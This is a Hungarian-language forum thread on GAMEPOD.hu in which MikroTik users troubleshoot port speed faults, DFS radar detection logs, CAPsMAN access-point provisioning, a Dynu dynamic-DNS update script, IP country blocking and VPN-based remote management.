-
GAMEPOD.hu
Mikrotik routerekkel foglalkozó téma. Mikrotik router típusok, hardverek, router beállítások, programozás (scriptek írása), frissítés, és minden Mikrotik routerrel kapcsolatos beszélgetés helye.
Új hozzászólás Aktív témák
-
válasz ssarosi #5995 üzenetére
Igaz nem Mikrotik, de van olyan switch-em, amin 8 portból van mindenféle: 0, 10, 100, 1000 Mbps link (ha próbaképp mindre dugok 1000-res túloldalt). Mikor megvettem (használtan) még mind jó volt, és sorban rosszabbodott, míg kicseréltem egy újra (mikor elfogadhatatlan lett, amit még tudott). Az új nem problémázik, szóval nem hiszem hogy a túloldal gyilkolta meg a régit.
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
ssarosi
tag
válasz Ablakos #5994 üzenetére
Nem értem a dolgot.
A konfig jó.
A kábelek is, mivel az 5-ös porton mindkettő hibátlanul működik.
Volt router kikapcsolás, reset configuration, semmi sem segített. A PC-t is újraindítottam.Most órák múlva ismét kipróbálva meg Gbiten megy. Mindkét kábellel.
Semmin sem változtattam.Mitől javult meg?
[ Szerkesztve ]
-
ssarosi
tag
RB2011 2-es portja és a pc között kábelt cseréltem cat6-ra, mert az előző kábel egyik csatlakozójának a pöcke eltörött.
Csodálkozva vettem észre fájl másoláskor az alacsony sebességet, amit a 100 Mbites kapcsolat okozott.
Visszatettem a régi kábelt, az is csak 100 Mbittel linkel.
Másik portba áttéve megvan a Gbit.
Mindkét kábellel.
Konfig mentése után csináltam egy resetet, úgy is csak 100 Mbit a kapcsolat sebessége a 2-es porton.
Az érintkezőket néztem, nincs elgörbülve egy sem, tudom a Gbithez 4 érpár kell.Bekapcsolt állapotban cseréltem kábelt, lehet hogy részben meghalt a port?
[ Szerkesztve ]
-
ekkold
Topikgazda
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
ekkold
Topikgazda
Próbáld meg station pseudobridge clone-ként csatlakoztani a mikrotiket. A sima station pseudobridge MAC címfordítást végez, míg a clone továbbítja az eredeti MAC címet az AP felé.
Előfordulhat, hogy így sem megy, mert az AP felől nem kapnak IP címet a kliensek, ilyenkor általában valamilyen inkompatibilitás miatt nem mennek át olyan layer2-es csomagok, amiknek mennie kellene. Amikor ez a helyzet áll ellő, arra eddig csak olyan megoldást találtam, hogy sima station-ként kell csatlakozni, és NAT-olni kell a további kliensek felé.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
g4b3n
tag
Sziasztok!
Adott egy hAP lite, amit wifi extenderként szeretnék használni.
wlan1-t csatlakoztatom a megnövelendő SSID-hez, jelszó is beállítva, beállítom station pseudobridge-ként
wlan2-t létrehozom, adok neki másik SSID-t, beállítom ap bridge-ként
a kettő 1 bridge alá teszemviszont hiába csatlakozok wlan2-re, nincs internet kapcsolat
próbáltam videóval is beállítani, nem sikerült.
Mit kell még beállítani? -
#42556672
törölt tag
válasz bambano #5987 üzenetére
A helyzet nem ennyire egyszerű. A RADAR kb 1°-os nyílásszögű nagy nyereségű antennával dolgozik impulzus üzemben. Ezt az impulzust érzékeli a router és elkezdi nem használni a frekit. Sajnos vannak eszközök pl. az Iphon 6 ami egy véletlen/hiba folytán RADAR-nak tűnik a routereknek bár elvileg ezt a hibát már javították.
Ez a nagy érzékenységű irányított antenna ilyenkor 200km-ről is veszi a kisugárzott jeledet és esőnek detektálja, ma már könnye(bbe)n ki lehet szűrni mert tipikus a mintázata egy vonalban látszik a radarképen.
2016-ban volt, hogy folyamatosan 30 napig nem ment a MET radarja a zavarások miatt. Az EU-n belül elkezdték komolyan kivizsgálni ezeket az ügyeket pont amiatt, hogy ezek a MET adatok rendkívül fontosak egy csomó területnek.
Ebbe bekavar, hogy sajnos Military RADAR-ok is vannak, utasszállítókon is vannak RADAR-ok.....
Nem könnyű :-(
A 48-as csatorna alatt nincs RADAR de ott csak Indoor felhasználás van "elvileg"
Ezt a Video-t érdemes megnézni: https://www.youtube.com/watch?v=ZbrbRUAfpac
-
bambano
titán
"Egyébként nekem eleve furcsa, hogyan képes egy 100mW-os tartományban dolgozó wifi, egy ahhoz képest brutális adóteljesítményű radar zavarására.": úgy, hogy hiába ad nagy adóteljesítménnyel a radar, sok kilométerről a visszaverődő jel már nem erősebb, de lehet, hogy gyengébb, mint amit egy illegálisan megtolt, irányított antennás wifi kitol magából. és ha meglövöd a radart, akkor az érzékelt képen mindig lesz egy tárgy, amiről látszólag visszaverődik a jel. rosszabb esetben meg is vakítja a vevőt.
a valódi kérdés inkább az, hogy a korábban szabad sávnak deklarált wifi sávra miért lett kijelentve, hogy a radar elsőbbséget élvez.
Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
ekkold
Topikgazda
válasz janos666 #5984 üzenetére
A régi RouterOS-ban a DFS=off volt a default. Az újabbakban meg DFS=on és kivették a menüpontot is ahol ki lehetett venni a pipát, gondolom azzal a verzióval kezdett szakadozni a link...
Egyébként nekem eleve furcsa, hogyan képes egy 100mW-os tartományban dolgozó wifi, egy ahhoz képest brutális adóteljesítményű radar zavarására. De ha mégis ez a helyzet akkor miért adták ki ugyanezeket a frekenciákat wifi-re, miért nem 4GHz-es vagy éppen 6GHz-es (vagy bármi más) sávot használunk wifire?
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
ekkold
Topikgazda
válasz #42556672 #5983 üzenetére
A linkelt cikk 5600-5650MHz közötti frekvenciákat említ. Nos nekem 5320MHz-en is radart detektál, ráadásul itt bent a szobában.... De ugyanez történik pl. 5700MHz-en is. Tehát magyarán olyan frekvenciákon sem akar menni emiatt, ahol elvileg nincs magyarországi meteorológiai radar. Nekem jelenleg nincsenek 5GHz-es eszközeim, ezért csak a 2,4GHz-et használom, de ezek után nem csodálkozom, hogy sokan kikapcsolják a radar detect funkciót. Ha szükségem lesz rá én is ezt fogom tenni, legfeljebb nem az 5600-5650 MHz -es tartományt használom majd - a mikrotik hardvere 4980 - 6100 MHz között tud dolgozni, szóval csak akad olyan frekvencia ami nem ütközik mással. Mellesleg ha itthon szkennelek az 5GHz-es sávban, egyetlen egy wifit sem találok....
Nem lehet, hogy a meteorológiai radarok öreg, 100éves berendezések, és esetleg más frekvenciákat is zavarnak? Avagy mitől detektál olyan frekvenciákon is radart a mikrotik, ahol nem kellene annak lennie?
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
válasz #42556672 #5983 üzenetére
Lehet, hogy félreértem, de ez alapján állítottam be a scanlist-et 5500:5700:20-ra:
(5150 - 5250 @ 80), (23), NO-OUTDOOR, AUTO-BW, wmmrule=ETSI
# note: max would be +3dB with TPC @ 5250-5725
(5250 - 5350 @ 80), (20), NO-OUTDOOR, DFS, AUTO-BW, wmmrule=ETSI
(5470 - 5725 @ 160), (27), DFS, wmmrule=ETSI
# "Short Range Devices (SRD)"
# ref: 2006/771/EK, (EU) 2017/1483, MSZ EN 300 440, MSZ EN 302 064
(5725 - 5875 @ 80), (25 mW)Ebben nem látok DFS nélkül kültérre és távolra engedélyezett tartományt.
De próbaképp szétnéztem 5260-5320 közt is, és ott is találnak radart.Az NMHH link szerint csak 5600 és 5650 közt kéne radarnak felbukkannia.
Gondolom lehet az NMHH-n kívül másnak is hasonló radar-ja. Vagy nálunk más DFS frekin kvázi-legális kilőni a DFS-t (gyakorlatilag véletlen sem jön matricázott autó kopogtatni)?A beltéri, földszinti AP 5170-5250 (van a földszinten egy AC kliens, ami nem működik megfelelően DFS csatornákon), az első emeleti beltéri 5250-5330, a padlás üres, a tetőn pedig a két kültéri AP.
Az emeleti beltéri AP sohasem lát radart, igaz két fal választja el a külvilágtól (középcső lépcsőházból). Nem tudom mikor kezdődött a kültériekkel a radar móka, nem figyeltem (miután kezdetben kijátszogattam magam a konfigurálgatással, utána hosszú időre elfelejtettem, hogy vannak, csak rájuk dobtam néha a friss ROS-t).
Azon próbálom erősen törni a fejem, hogy vajon DFS=off (régi firmware-ben még volt ilyen) vagy akár SC módban felejthettem-e esetleg őket véletlenül régen, és azért működtek-e ennyi szakadozás nélkül (míg mondjuk frissítéssel eltűnt a DFS=off, vagy egyszer láttam, hogy "ez meg miért van SC-ben?" és kivettem...).
[ Szerkesztve ]
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
Pontosan mit jelent az a gyakorlatban, mikor annyi jelenik meg a log-ban, hogy "radar detected on xxx0000"? Akkor is ezt naplózza, ha nem valódi radar-on működik a DFS, hanem szimplán a spektrális eloszlás tűnik ott túlzsúfoltnak, ahol épp van? Vagy "divat" lett direkt piszkálni mások magáncélú legális (DFS=on) vonalait hamis radar mintákkal (pl. valami szolgáltató)?
Évek óta üzemelt feltűnő/zavaró szakadások nélkül két SXT (két AP egy karón ~160° szöggel egymástól, 1-2 km távra), de mostanság látványos lett, hogy szakadozik, így elkezdtem nézni a naplókat és főleg az átlagosan csak kicsit magasabb, de jobban ingadozó sávszélt bonyolító AP ugrál néha reménytelenül fel-alá, mindenhol csak radar, radar, radar.
Miközben elkezdtem felvezetni egy excel táblába a radar frekiket, végül egyrészt arra jutottam, hogy az 5500-5700:20 tartományban (ez a scanlist mindkettőn) gyakorlatilag az összes standard 20MHz csatornán lát radart a cucc akár egy napon belül, de ami picit "gyanússá" látszik nekem tenni a dolgot, hogy úgy tűnik, mint ha sokkal sűrűbben találna radar-t, ha kézzel pakolászom a kezdő frekvenciát (hogy "térképezzek" ott is ahova véletlenszerűen még nem dobta be, majd le), akkor "felbolydul a méhkas" és agyvesztve ugrál 1-2 percenként a csatornák közt, míg végre lenyugszik valahova, akár olyan helyre ahol az excel táblámba pár órával korábban írtam be egy radar-t és ott marad mondjuk egy napot. Ha másnap megint hozzányúlok kézzel, akkor megint megőrül és hirtelen már megint van radar ott is, ahol az előtt állt, hogy pl. frissítettem a ROS-t és emiatt indult újra megint a manuálisan választott frekivel.
Ez persze lehet véletlen, de inkább tűnik valami rosszindulatú bökdösésnek, vagy esetleg bug-nak.
Pl. itt van most ez:
13:54:02 system,info,account user admin logged out from 192.168.1.111 via winbox
14:01:17 wireless,info wlan1: radar detected on 5500000
14:01:17 wireless,info @wlan1: disconnected, disabling
14:01:47 wireless,info wlan1: radar detected on 5580000
14:02:55 wireless,info @wlan1: connected, signal strength -60, wants bridge
14:10:31 wireless,info wlan1: radar detected on 5540000
14:10:31 wireless,info @wlan1: disconnected, disabling
14:11:36 wireless,info @wlan1: connected, signal strength -65, wants bridge
17:42:37 system,info,account user admin logged in from 192.168.1.111 via winbox
17:48:05 wireless,info @wlan1: disconnected, disabling
17:48:05 system,info device changed by admin
17:58:13 wireless,info @wlan1: connected, signal strength -61, wants bridge
18:53:21 wireless,info wlan1: radar detected on 5600000
18:53:21 wireless,info @wlan1: disconnected, disabling
18:53:24 wireless,info wlan1: radar detected on 5640000
18:53:35 wireless,info wlan1: radar detected on 5620000
18:54:42 wireless,info @wlan1: connected, signal strength -60, wants bridge
18:59:11 wireless,info wlan1: radar detected on 5540000
18:59:11 wireless,info @wlan1: disconnected, disabling
18:59:41 wireless,info wlan1: radar detected on 5660000
19:00:08 wireless,info wlan1: radar detected on 5560000
19:01:15 wireless,info @wlan1: connected, signal strength -63, wants bridge
19:04:31 wireless,info wlan1: radar detected on 5580000
19:04:31 wireless,info @wlan1: disconnected, disabling
19:05:01 wireless,info wlan1: radar detected on 5500000
19:05:11 wireless,info wlan1: radar detected on 5520000
19:05:21 wireless,info wlan1: radar detected on 5680000
19:23:49 wireless,info wlan1: radar detected on 5600000
19:23:52 wireless,info wlan1: radar detected on 5640000
19:24:12 wireless,info wlan1: radar detected on 5620000
19:29:39 wireless,info wlan1: radar detected on 5540000
19:30:06 wireless,info wlan1: radar detected on 5660000
19:30:26 wireless,info wlan1: radar detected on 5560000Közben a másik AP viszonylag nyugisan volt el 5680-on, úgyhogy most nem is "egymást üldözték" (már erre is gondoltam, hogy mikor túl közel vannak a frekik, akkor zavarják egymást az egy karón lévő AP-k, de ez szerintem már akkor is sok).
[ Szerkesztve ]
TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
asdf_
veterán
válasz Virgi44 #5978 üzenetére
A ket halozat nyilvan nem lehet ugyanabban a tartomanyban, az egyiket at kell rakni mashova.
Kesobbiekre aranyszabalykent: a routerek default dhcp tartomanyat soha nem hasznaljuk semmire, tehat 192.168.0.x, 1.x, 2.x, 88.x, 100.x, 10.0.0.x igy elso blikkre, mert egyszer kelljen egy jol belakott, fix ip-kkel ellatott halozatot osszekotni egy ugyanilyennel es kesz a szopas.(#5964) bambano
egyébként meg postgresql.Ahhoz sajna nem ertek. :/
[ Szerkesztve ]
-
Virgi44
csendes tag
Sziasztok,
működő Ipsec VPN kapcsolatom van Windows kliensről távoli Mikrotik routerre.
A problémám az, hogy ha a saját Mikrotik routeremen keresztül hozom létre a kapcsolatot, akkor nem érem el a távoli gépeket, helyette a helyi hálózat azonos IP címein lévő eszközök jelentkeznek.
Ha máshonnan indítom a VPN-t, pl. megosztok egy mobilinternetet, akkor mindent rendben elérek.Feltételezem, hogy az a baj (route print alapján), hogy mindkét Mikrotik routernek azonos az átjárója 192.168.88.1.
Van erre valami ötletetek?
Előre is köszönöm.[ Módosította: Intruder2k5 ]
-
bambano
titán
válasz #42556672 #5976 üzenetére
de csak és kizárólag az ubnt switcheivel fordult elő egyrészt nagy tömegben, másrészt úgy, hogy azonnal cserélték és a cseredarab is döglött volt. a net tele van olyan beszámolókkal, hogy a 3-4. darab indult csak el. minden gyártónál lehet peches széria, amikor 3-4% cucc is rossz, de olyan, hogy 80% rossz legyen, máshol nem volt.
Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
bambano
titán
nálunk az ubnt nem akarja, hogy használjuk. mikor egy nagy switch kellett volna, rábeszéltem a főnököt, hogy legyen ubnt, rögtön azzal mutatkozott be, hogy doa. dead on arrival. ezzel vége is lett az ubnt meg sem kezdett karrierjének nálunk.
Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
kovyhun
tag
Köszönöm.
Pont ez volt a gondom, hogy semmit nem írt a logba. Legközelebb próbálom így.
Lépésenként kerestem a hibát, írattam ki a változók értékeit, egyszer csak jó lett.
Lehet csak egy sortörés okozott gondot. Több külföldi fórumon írták hogy nem működik, de megoldást nem kaptak.Más:
Tesztelés közben viszont fura dolog is történt, újracsatlakozások után volt hogy ránézésre teljesen más ip-t kaptam mint szoktam (Telekom ADSL - Vas megye). Aztán kipróbálva tényleg más, lehet nat-olt, mert csatlakozni nem tudtam rá.
Pl: 95c820bc.mobile.pool.telekom.hu [149.200.32.188]
Ilyesmi szokott lenni: 51b85b67.dsl.pool.telekom.hu [81.183.61.81]
Pedig ide jön egy másik hálózat VPN hívása -
ekkold
Topikgazda
-
nagyúr
válasz #42556672 #5970 üzenetére
Hát igen.
En tavasszal ujitottam fel kompletten a lakast (viz,gaz,villany,stb) es gondoltam erre.Mi hasznaltunk vegyesen ubnt es mikrotik eszkozoket is.
Sebesseg teren jobb az ubnt. Gerinc halozathoz csak ubnt-t hasznaltunk, aztan a vegen mar a szektorokat is ubnt-vel oldottuk meg.
Mikortiknek az erossege a testreszabhatosag. Rengeteg mindent tudsz allitgatni szabadon amire ubnt eseten nincs lehetoseg.Új hardverek számlával, garanciával érd PM.
-
#42556672
törölt tag
Teljesen egyetértek veled abban, hogy ha egy eszközzel megoldható pénzkidobás többet venni.
Az én tapasztalatom, hogy a legritkább esetben lehet optimális helyre tenni a router-t, az épületek kialakításánál még ma is ritkán gondolnak arra, hogy oda csövezzék a bejövő kábelt ahol a router optimális lesz. Így marad az, hogy az "árnyékos" részekre csak le kell tenni AP-t,, pláne 5GHz-en.
UBNT-n is gondolkodtam régebben, szerintem kb. ugyanazt tudja mint a Mikrotik. Akkoriban árban jobban jöttem ki Mikrotik-ből azóta meg megszoktam. Ami nekem viccessé tette őket amikor elkezdtek anyagokat gyártani ahol csak egyetlen gyártóval a Mikrotikkel kezdték a cuccaikat összehasonlítani és ez olyan szánalmas ízt adott nekik, bár azt gyanítom ez a Marketing/PR osztály remekműve lehetett nem a mérnököké.
-
-
#42556672
törölt tag
Én azt gondolom, hogy a router-ben ne legyen WiFi, azt tegyük be a rack-be és tegyünk le annyi AP-t amivel teljes lefedettséget tudunk biztosítani. Én ha ma kellene dönteni már nem a 3011-et hanem ezt venném.
Az ára szerintem teljesen rendben van.
Amire még várnék, hogy jöjjön egy olyan fw ami stabilabban megy vele mint a jelenlegi.
-
nagyúr
válasz bambano #5966 üzenetére
Nem tul kecsegteto az ara, ha mar a wifi nelkuli is ennyi.
Gonrolkodtam multkoraban, hogy kivaltom az rb450+hAP ac-t egy wifis verziora, de a wifi resze is "visszalepes" egy hAP AC-hoz kepest, es sok kulfoldi oldalon a switch reszet is szapultak.
Szoval egyelore marad minden a regibe.
Viszont azt jo latni, hogy most mar van alternativaja boven az RB1100-nak, de meg sok esetben mindig nagyon le vannak maradva teljesitmeny teren az Ubiquti-hez kepest hw-be.Új hardverek számlával, garanciával érd PM.
-
bambano
titán
megérkezett a 4011 a wireless boltba meg az iponba is.
Egy átlagos héten négy hétfő és egy péntek van (C) Diabolis
-
kovyhun
tag
Sziasztok!
Használ valaki Dynu ddns-t?
Az oldalukon lévő script nem akar múködni:
https://www.dynu.com/DynamicDNS/IPUpdateClient/Mikrotik-Dynamic-DNS
Pár pontosvesszőt töröltem, van ahol az idézőjelet pótoltam, de még mindig nem jó, valószínű van még benne hiba, csak nem találom# get the current IP address from the internet
/tool fetch mode=http address="checkip.dynu.com" src-path="/"
dst-path="/dynu.checkip.html"
:local result [/file get dynu.checkip.html contents]
# parse the current IP result
:local resultLen [:len $result]
:local startLoc [:find $result ": " -1]
:set startLoc ($startLoc + 2)
:local currentIP [:pick $result $startLoc $resultLen]
:global ddnsuser "your_Dynu_username"
:global ddnspass "your_Dynu_password"
:global ddnshost "your_Dynu_hostname"
:global ipddns [:resolve $ddnshost]
:if ($ipddns != $currentIP) do={
:log info ("DynuDDNS: IP-Dynu = $ipddns")
:log info ("DynuDDNS: IP-Fresh = $currentIP")
:log info "DynuDDNS: Update IP needed, Sending UPDATE...!"
:global str "/nic/update?hostname=$ddnshost&myip=$currentIP"
:log info "currentIP is $currentIP"
/tool fetch address=api.dynu.com src-path=$str mode=http user=$ddnsuser password=$ddnspass
dst-path=("/Dynu.".$ddnshost)
:delay 1
:global str [/file find name="Dynu.$ddnshost"]
/file remove $str
:global ipddns $currentIP
:log info "DynuDDNS: IP updated to $currentIP!"
} else={
:log info "DynuDDNS: No change needed"
}Valakinek van ötlete?
-
asdf_
veterán
Ket bajom van ezzel az IP forrasorszag szerinti letiltasaval. Az ipaddresslocation.org-os lista valoban bovebbnek tunik, de nincs multiple selection, egyesevel kell letolteni az orszagokhoz tartozo listat, majd manualisan osszefuzni, ez siman horror (mailserver elott hasznalnam, igy az tunik logikusabbnak, hogy amit ki akarok zarni, azt kizarom, amirol nem tudok semmit -nincs a listaban- azt kenyszeruen beengedem, forditva ugye szopo lehet, ha egy adott tartomanyt megkap/megvesz egy orszag, de a listaban nincs benne, es igy kizarodna az eleresbol), a masodik es fo problemam, hogy kene valami tool, amivel ezt a horrorisztikus mennyisegu ip listat egyszerusiteni lehet. Mert ha mondjuk a 111.111.0.0-111.111.63.255-ig reszt /24-es darabokban megkapta 64 orszag kulon, 111.111.64.0-127.255-ig reszt negyedekben negy orszag, a 111.111.128.0-111.111.255.255-ig meg egyben meg egy orszag, es ezek kozul mondjuk nekem mindegyik fent lenne a tiltolistamon, leven a fel vilagot kitiltom a francba, akkor egy 80-100 ezer soros listaban 69 darabban ott van ez a tiltas, de sokkalta ertelmesebb lenne, ha egyetlen sorban lenne tiltva a 111.111.0.0/16 oszt csokolom, es akkor nem 100 ezer folotti soros lenne a lista, hanem mondjuk hasra minimum a negyede.
Szoval fele kiralysagom egy programert, ami 100 ezres nagysagrendu elemet tartalmazo CIDR ip listat eloszor sorbarak, majd egyszerusit -
ekkold
Topikgazda
Egy mini szervert indítanék a mikrotikből wake on lan-al, (/tool wol mac=xx:xx:xx:xx:xx:xx) és a következőt tapasztalom: hAPac-ből és RB951-ből fel tudom ébreszteni, de a hAPac^2-ből nem! Ez ismert hiba, vagy lehet valami más ok amiért az utóbbi routerből nem megy?
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
veterán
válasz MasterDeeJay #5834 üzenetére
cert-hungary.hu oldalon incidensként bejelentettem az ip-címet ami csesztette a winbox portomat és már 22-e óta nem jött próbálkozás onnan. Rápróbáltam a korábbi dolgokra és rendben van látszólag minden.
Ma meg írtak a govcerttől hogy incidens lezárva.Nem hittem volna hogy megoldják. Most fogom az összes magyar ip-t amiről csesztetik a routeremet és bejelentem. Jó lenne ha kevesebb feltört mikrotik lenne a neten.
-
quby
őstag
válasz #42556672 #5959 üzenetére
Melohelyröl nem tudom ellenörizni, délután megnézem, de majdnem tuti hogy igen, mert exportáltam a az eslö konfigját, és azt nyomntam fel a többire. Csak az identity változott manual unique-ra. De szerintem ha nem igy lenne akkor nem is jelenne meg a CAP interfacek között. köszi hogy foglalkozol vele.
A legügyesebb állat az ürge, hiszen búzával teli pofazacskóval is képes repülni, miközben egy bagolyt egyensúlyoz a hátán.
-
#42556672
törölt tag
Annyi látszik, hogy eltérő extension channel-t és frekvenciát használ(na) a CAP AC ami ha ugyanaz a konfig menne rá nem lehetséges a WAP hoz képest.
5180/20-Ceee/ac(17dBm vs 5785/20-eeCe/ac(30dBm)
A 4018vs 4019-cel ne törődj ugyanaz a család valószínűleg ugyanaz a driver.
A CAP AC-nél a Wireless/WiFi Interfaces/CAP részben mindkét csatolót hozzáadtad? (WLAN1&WLAN2???)
-
quby
őstag
Hát ebben a kimentben nekem is van 1-2 nem világos dolog, de 2.4-en is "station" és ott minden rendben. A configuration és a provisioning igy néz ki:
[quby@xxxxx] > caps-man configuration print
0 name="lan24" mode=ap ssid="proline" security=lan_security datapath=datapath1 datapath.bridge=lan
channel.band=2ghz-g/n
1 name="lan5" mode=ap ssid="proline" security=lan_security datapath=datapath1 datapath.bridge=lan channel.band=5ghz-a/n/ac
[quby@xxxxx] > caps-man provisioning print
Flags: X - disabled
0 radio-mac=00:00:00:00:00:00 hw-supported-modes=gn identity-regexp="" common-name-regexp=""
ip-address-ranges="" action=create-dynamic-enabled master-configuration=lan24 slave-configurations=""
name-format=identity name-prefix=""
1 radio-mac=00:00:00:00:00:00 hw-supported-modes=ac identity-regexp="" common-name-regexp=""
ip-address-ranges="" action=create-dynamic-enabled master-configuration=lan5 slave-configurations=""
name-format=identity name-prefix=""A legügyesebb állat az ürge, hiszen búzával teli pofazacskóval is képes repülni, miközben egy bagolyt egyensúlyoz a hátán.
-
ekkold
Topikgazda
Nem értek hozzá, de miért látom mindegyiknél azt, hogy "mode=station"? Nekem az 5GHz sokszor radar detect hibaüzenettel tagadta meg a működést... Vagy auto-ra kell tenni a frekvenciát, vagy sc....
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
ekkold
Topikgazda
válasz macimeister #5942 üzenetére
Egy barátom ezt úgy oldotta meg, hogy a saját routerén beüzemelt egy VPN szervert, az ügyfelek routerei pedig VPN-el kapcsolódtak hozzá. Igy a nem publikus IP-vel rendelkezők is elérhetők. Az aktív VPN kapcsolatok listájában látszik, hogy mindenki online-e, és szükség esetén az élő kapcsolaton át el is érhetőek a routerek.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
quby
őstag
Sziasztok!
Van 3 ap mindhárom AC-s. 2 db "cAP ac" (gyári specifikéció szerint ipq 4018, de winbox azt mondja hogy ipq 4019) és egy "wAP ac" (ez atheros AR9xxx) Alap beállitások, csak annyi hogy betaláljon a CAPsMAN-hez + default safety, de mindháromnál ugyanaz.
Egy SSID-t nyomn(á)nak2.4-en és 5-ön is. A gond az hogy a 2 cAP ac nem akarja 5gHz-et
[quby@indoor1] > interface wireless print
Flags: X - disabled, R - running
0 X ;;; managed by CAPsMAN
;;; channel: 2432/20-Ce/gn(30dBm), SSID: proline, CAPsMAN forwarding
name="wlan1" mtu=1500 l2mtu=1600 mac-address=B8:69:F4:51:47:7F arp=enabled interface-type=IPQ4019 mode=station
ssid="MikroTik" frequency=2412 band=2ghz-b/g channel-width=20mhz secondary-channel="" scan-list=default
wireless-protocol=any vlan-mode=no-tag vlan-id=1 wds-mode=disabled wds-default-bridge=none wds-ignore-ssid=no
bridge-mode=enabled default-authentication=yes default-forwarding=yes default-ap-tx-limit=0
default-client-tx-limit=0 hide-ssid=no security-profile=default compression=no
1 X ;;; managed by CAPsMAN
;;; channel: 5180/20-Ceee/ac(17dBm), SSID: , CAPsMAN forwarding
name="wlan2" mtu=1500 l2mtu=1600 mac-address=B8:69:F4:51:47:80 arp=enabled interface-type=IPQ4019 mode=station
ssid="MikroTik" frequency=5180 band=5ghz-a channel-width=20mhz secondary-channel="" scan-list=default
wireless-protocol=any vlan-mode=no-tag vlan-id=1 wds-mode=disabled wds-default-bridge=none wds-ignore-ssid=no
bridge-mode=enabled default-authentication=yes default-forwarding=yes default-ap-tx-limit=0
default-client-tx-limit=0 hide-ssid=no security-profile=default compression=noMíg a wAP ac kiválóan teszi a dolgát:
[quby@AP_outdoor] > interface wireless print
Flags: X - disabled, R - running
0 X ;;; managed by CAPsMAN
;;; channel: 2412/20-Ce/gn(30dBm), SSID: proline, CAPsMAN forwarding
name="wlan1" mtu=1500 l2mtu=1600 mac-address=CC:2D:E0:B5:0C:4A arp=enabled
interface-type=Atheros AR9300 mode=station ssid="MikroTik" frequency=2412 band=2ghz-b/g
channel-width=20mhz secondary-channel="" scan-list=default wireless-protocol=any
vlan-mode=no-tag vlan-id=1 wds-mode=disabled wds-default-bridge=none wds-ignore-ssid=no
bridge-mode=enabled default-authentication=yes default-forwarding=yes default-ap-tx-limit=0
default-client-tx-limit=0 hide-ssid=no security-profile=default compression=no
1 X ;;; managed by CAPsMAN
;;; channel: 5785/20-eeCe/ac(30dBm), SSID: proline, CAPsMAN forwarding
name="wlan2" mtu=1500 l2mtu=1600 mac-address=CC:2D:E0:B5:0C:49 arp=enabled
interface-type=Atheros AR9888 mode=station ssid="MikroTik" frequency=5180 band=5ghz-a
channel-width=20mhz secondary-channel="" scan-list=default wireless-protocol=any
vlan-mode=no-tag vlan-id=1 wds-mode=disabled wds-default-bridge=none wds-ignore-ssid=no
bridge-mode=enabled default-authentication=yes default-forwarding=yes default-ap-tx-limit=0
default-client-tx-limit=0 hide-ssid=no security-profile=default compression=noA 2 cAP ac-nál nincs is 5 gHz-en ssid. Provision-elve dinamikusan jöttek létre, nem manual beállitásokkal. Ennek igy teljesen egyformának kellene lenniük. Jól tévedek? Mit rontok el?
[ Szerkesztve ]
A legügyesebb állat az ürge, hiszen búzával teli pofazacskóval is képes repülni, miközben egy bagolyt egyensúlyoz a hátán.
-
ekkold
Topikgazda
válasz ssarosi #5950 üzenetére
Egyszer belefutottam egy olyan routerbe amit szintén állandóan ledobott. Bridge-ben voltak a portjai és a wifi is, és a bridge folyton cserélgette a mac addressét. A switch amire rá volt dugva, mire megtanulta a mac címet addigra pont újra megváltozott. Aztán beállítottam a bridge-nek fixen az ether1 mac címét.
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
ssarosi
tag
Van egy 100 éve konfigurált RB2011 wifis routerem v6.40.9 ROS-el.
Tegnap rátettem a v6.42.9 verzót frissítésként.
Innentől kezdve nem értem el belső hálón, sem winboxal sem böngészőn keresztül.
A router egyébként működött, ment a net, a wifi is.
Reset lett a vége, downgrade és config visszaállítás backupból.
Mit csináltam rosszul?
Vagy lehet valami a configban amit másképp kellene megoldani?
Nem tudok rájönni.Van még egy problémám.
A mac alapú hozzáférés nálam nem akar működni. Soha nem volt jó a kb. 3 év alatt.
1-2 mp után ledob, ennyi idő alatt semmit sem lehet csinálni, pl. ip címet adni.
Olvastam, hogy nem szereti a virtuális gépeket vagy virtuális switchet.
A laptopomról sem megy, azon pedig nincs hyper-v.
Ötlet, tanács?Köszönettel:
[ Szerkesztve ]
-
A Factory-only tippre szerintem ezeket jelenetheti:
- Mostantól ez a verzió kerül a frissenn gyártott hardware-ekre a gyárban
- A szoftveresek ki akarták adni, de megbukott valami utolsó belső teszten
- Valamilyen speciális, házon belüli tesztelési célra készítették (kis változtatással a legutóbbi "release" kódhoz, nem a legfrisebb béta/RC kódból)TV/monitor kalibrálást vállalok. ||| "All right , Thom. But understand this: I do care for you. I care for all the lost souls than end up up here."
-
ekkold
Topikgazda
Nézem a changelog-ot és nem értem. Miért adtak ki egy 6.43.3 verziót úgy hogy sem hibajavítás sem új funkció nem került bele?
Release 6.43.3 2018-10-18
What's new in 6.43.3 (2018-Oct-05 13:12):
(factory only release)Netán megint valami súlyos hibát javítottak, amit elfelejtettek beírni ide?
http://skory.gylcomp.hu/ http://www.skory.z-net.hu/ https://skori.hu/ https://skori.spacetechnology.net/
-
#42556672
törölt tag
válasz macimeister #5942 üzenetére
WinBOX, de ha biztonságosan akarod akkor VPN-nel menj be rá és a WAN port felől ne tedd elérhetővé!
-
senior tag
válasz Cirbolya_sen #5943 üzenetére
És a WinBox-al szépen, átláthatóan tudsz monitorozni 10, 20 vagy akár 100 db routert 😀
-
Cirbolya_sen
aktív tag
válasz macimeister #5942 üzenetére
